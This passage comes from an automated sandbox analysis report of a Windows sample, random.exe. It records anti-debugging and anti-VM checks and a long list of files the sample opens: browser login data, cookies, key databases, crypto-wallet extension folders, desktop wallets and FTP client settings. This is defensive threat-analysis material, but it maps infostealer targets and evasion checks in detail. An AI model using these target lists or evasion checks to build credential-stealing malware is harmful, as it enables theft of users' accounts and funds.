      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
      Source: random.exe, 00000000.00000002.1151080655.0000000001064000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
      Source: random.exe, 00000000.00000003.1079865848.0000000006007000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696501413
      Source: C:\Users\user\Desktop\random.exe System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\random.exe Process information queried: ProcessInformation

      Anti Debugging

Source: C:\Users\user\Desktop\random.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\random.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\random.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\random.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\random.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\random.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\random.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random.exe | File opened: NTICE
Source: C:\Users\user\Desktop\random.exe | File opened: SICE
Source: C:\Users\user\Desktop\random.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\random.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\random.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\random.exe | Process queried: DebugPort
Source: random.exe, 00000000.00000002.1151080655.0000000001064000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: GProgram Manager
Source: C:\Users\user\Desktop\random.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\random.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: random.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150605286.000000000175F000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144030458.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150658487.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1124260706.000000000175D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1127822478.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151708836.000000000175F000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1143968813.000000000175F000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\random.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1046421738.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\random.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\random.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\QFAPOWPAFG
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\random.exe | Directory queried: C:\Users\user\Documents\IZMFBFKMEB
